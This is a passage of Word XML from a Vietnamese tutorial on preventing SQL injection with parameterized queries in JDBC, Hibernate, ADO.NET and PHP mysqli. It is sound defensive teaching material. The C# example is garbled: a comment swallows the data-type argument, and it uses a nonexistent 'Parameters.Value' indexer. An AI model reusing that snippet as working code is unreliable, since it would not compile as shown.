        <w:t xml:space="preserve"> là phương pháp để truy vấn cơ sở dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00570A7A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00570A7A" w:rsidRPr="00570A7A">
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidR="00570A7A">
        <w:t xml:space="preserve"> cung cấp nhiều phương pháp để truy vấn CSDL, trong đó có cả phương pháp tham số hóa dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="002F53E1">
        <w:t xml:space="preserve"> thông qua lớp </w:t>
      </w:r>
      <w:r w:rsidR="002F53E1" w:rsidRPr="002F53E1">
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r w:rsidR="00570A7A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF144B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E54D96">
        <w:t xml:space="preserve">Đoạn mã nguồn mắc lỗi trên sẽ được viết lại để đảm bảo an toàn. </w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4">
        <w:t xml:space="preserve">Lưu ý là các tham số sẽ được thêm vào qua các hàm </w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4" w:rsidRPr="005B6AC4">
        <w:t>set&lt;type&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4">
        <w:t xml:space="preserve"> (ví dụ như </w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4" w:rsidRPr="005B6AC4">
        <w:t>setString</w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidTr="00B32ABA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>Connection con = DriverManager.getConnection(connectionString);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t xml:space="preserve">String sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00B32ABA">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00B32ABA">
              <w:t xml:space="preserve"> FROM users WHERE username=? AND password=?”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>PreparedStatement lookupUser = con.prepareStatement(sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>lookupUser.setString(1, username); // add String to position 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>lookupUser.setString(2, password); // add String to position 2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>rs = lookupUser.executeQuery();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B3259C" w:rsidRDefault="00FE3533" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ngoài phương pháp trên, Java còn cung cấp Hibernate để truy vấn cơ sở dữ liệu, </w:t>
      </w:r>
      <w:r w:rsidR="00A706C3" w:rsidRPr="00A706C3">
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00A706C3">
        <w:t xml:space="preserve"> cung cấp khả năng cho phép ép ràng buộc biến - </w:t>
      </w:r>
      <w:r w:rsidR="00A706C3" w:rsidRPr="00A706C3">
        <w:t>binding variables</w:t>
      </w:r>
      <w:r w:rsidR="00A706C3">
        <w:t xml:space="preserve"> biến vào một tham số</w:t>
      </w:r>
      <w:r w:rsidR="00C43364">
        <w:t xml:space="preserve"> hóa</w:t>
      </w:r>
      <w:r w:rsidR="00D03A35">
        <w:t xml:space="preserve">. Phương pháp này cung cấp trong đối tượng </w:t>
      </w:r>
      <w:r w:rsidR="00D03A35" w:rsidRPr="00D03A35">
        <w:t>Query</w:t>
      </w:r>
      <w:r w:rsidR="0073015D">
        <w:t>, sử dụng các tham số hóa qua dấu hai chấm : (</w:t>
      </w:r>
      <w:r w:rsidR="0073015D" w:rsidRPr="0073015D">
        <w:t>:parameter</w:t>
      </w:r>
      <w:r w:rsidR="0073015D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A706C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0073015D">
        <w:t>hoặc giống như JBDC (dấu ?):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidTr="00D21755">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t xml:space="preserve">String sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00D21755">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21755">
              <w:t xml:space="preserve"> FROM users WHERE username=:username AND” +“password=:password”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>Query lookupUser = session.createQuery(sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CF6A85" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>// Add parameters to SQL quer</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21755">
              <w:lastRenderedPageBreak/>
              <w:t>y</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>lookupUser.setString(“username”, username); // add username</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>lookupUser.setString(“password”, password); // add password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>List rs = lookupUser.list();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00815231" w:rsidRDefault="00C16B7F" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Đối v</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ớ</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">i các ngôn ngữ lập trình .NET như C#, </w:t>
      </w:r>
      <w:r w:rsidR="00F67265" w:rsidRPr="00F67265">
        <w:t>Microsoft .NET</w:t>
      </w:r>
      <w:r w:rsidR="00F67265">
        <w:t xml:space="preserve"> cung cấp nhiều cách tham số hóa thông qua </w:t>
      </w:r>
      <w:r w:rsidR="00F67265" w:rsidRPr="00F67265">
        <w:t xml:space="preserve"> ADO.NET Framework</w:t>
      </w:r>
      <w:r w:rsidR="00F67265">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE61AE">
        <w:t xml:space="preserve">ADO.NET cung cấp nhiều </w:t>
      </w:r>
      <w:r w:rsidR="00AE61AE" w:rsidRPr="00AE61AE">
        <w:t>data providers</w:t>
      </w:r>
      <w:r w:rsidR="00AE61AE">
        <w:t xml:space="preserve"> khác nhau, tùy thuộc vào loại CSDL người </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve">dùng tương tác: </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.SqlClient</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>Microsoft SQL Server</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.OracleClient</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>Oracle databases</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.OleDb</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.Odbc</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>OLE DB</w:t>
      </w:r>
      <w:r w:rsidR="009B4478">
        <w:t xml:space="preserve"> và ODBC. Những </w:t>
      </w:r>
      <w:r w:rsidR="009B4478" w:rsidRPr="009B4478">
        <w:t>provider</w:t>
      </w:r>
      <w:r w:rsidR="009B4478">
        <w:t xml:space="preserve"> này phụ thuộc vào loại CSDL, driver mà người dùng sử dụng để truy cậ</w:t>
      </w:r>
      <w:r w:rsidR="00815231">
        <w:t>p, điều đó dẫn đến cú pháp cho việc tham số hóa dữ liệu là khác nhau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4696"/>
        <w:gridCol w:w="4592"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="003B5F5D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRPr="003B5F5D" w:rsidRDefault="003B5F5D" w:rsidP="003B5F5D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B5F5D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Data Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4811" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRPr="003B5F5D" w:rsidRDefault="003B5F5D" w:rsidP="003B5F5D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B5F5D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Parameter Syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="003B5F5D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00872F45" w:rsidP="00872F45">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00872F45">
              <w:t xml:space="preserve">System.Data.SqlClient </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4811" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00872F45" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00872F45">
              <w:t>@parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="003B5F5D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00F679BF" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F679BF">
              <w:t>System.Data.OracleClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4811" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="001E45E1" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001E45E1">
              <w:t>:parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="003B5F5D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00F679BF" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F679BF">
              <w:t>System.Data.OleDb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4811" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="008F0721" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sử dụng dấu ? để đánh dấu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F679BF" w:rsidTr="003B5F5D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F679BF" w:rsidRDefault="00F679BF" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F679BF">
              <w:t>System.Data.Odbc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4811" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F679BF" w:rsidRDefault="008F0721" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sử dụng dấu ? để đánh dấu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00815231" w:rsidRDefault="00AD2AED" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ví dụ với </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2AED">
        <w:t>SqlClient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provider, đoạn mã trên sẽ được sửa lại như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidTr="00E72392">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>SqlConnection con = new SqlConnection(ConnectionString);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t xml:space="preserve">string Sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00E72392">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00E72392">
              <w:t xml:space="preserve"> FROM users WHERE username=@username” +“AND password=@password”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd = new SqlCommand(Sql, con);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Add(“@username”, // nameSqlDbType.NVarChar, // data type</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>16); // length</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Add(“@password”,SqlDbType.NVarChar,16);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Value[“@username”] = username; // set parameters</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Value[“@password”] = password; // to supplied values</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>reader = cmd.ExecuteReader();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD2AED" w:rsidRDefault="00CA4181" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EB1EB3">
        <w:t>Đối với ngôn ngữ lập trình PHP, ngôn ngữ này cũng cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve"> nhiều</w:t>
      </w:r>
      <w:r w:rsidR="00EB1EB3">
        <w:t xml:space="preserve"> framework để truy cập dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EE2381" w:rsidRPr="00EE2381">
        <w:t>mysqli</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EB1EB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE2381" w:rsidRPr="00EE2381">
        <w:t>PEAR::MDB2</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EE2381" w:rsidRPr="00EE2381">
        <w:t>PHP Data Objects (PDOs) framework</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t>. Tất cả các framework này đều hỗ trợ việc tham số hóa dữ liệu.</w:t>
      </w:r>
      <w:r w:rsidR="00A65A26">
        <w:t xml:space="preserve"> đối với </w:t>
      </w:r>
      <w:r w:rsidR="00A65A26" w:rsidRPr="00A65A26">
        <w:t>mysqli</w:t>
      </w:r>
      <w:r w:rsidR="00A65A26">
        <w:t xml:space="preserve"> có thể sử dụng như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736345" w:rsidRPr="00736345" w:rsidTr="00736345">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$con = new mysqli(“localhost”, “username”, “password”, “db”);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$sql = “SELEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00736345">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">T </w:t>
            </w:r>
            <w:r w:rsidRPr="00736345">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00736345">
              <w:t xml:space="preserve"> FROM users WHERE username=? AND password=?”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$cmd = $con-&gt;prepare($sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003B6416" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$cmd-&gt;bind_param(“ss”, $username, $password); // bind parameters as strings</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$cmd-&gt;execute();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A65A26" w:rsidRDefault="000A4959" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00934855" w:rsidRPr="00934855">
        <w:t>PEAR::MDB2 package</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:t xml:space="preserve"> cung cấp khả năng tham số hóa, sử dụng dấu h</w:t>
      </w:r>
      <w:r w:rsidR="00520B88">
        <w:t>ỏ</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:t>i chấm (</w:t>
      </w:r>
      <w:r w:rsidR="00520B88">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:t>) để đánh dấu vị trí tham số</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">hóa. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidTr="00520B88">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
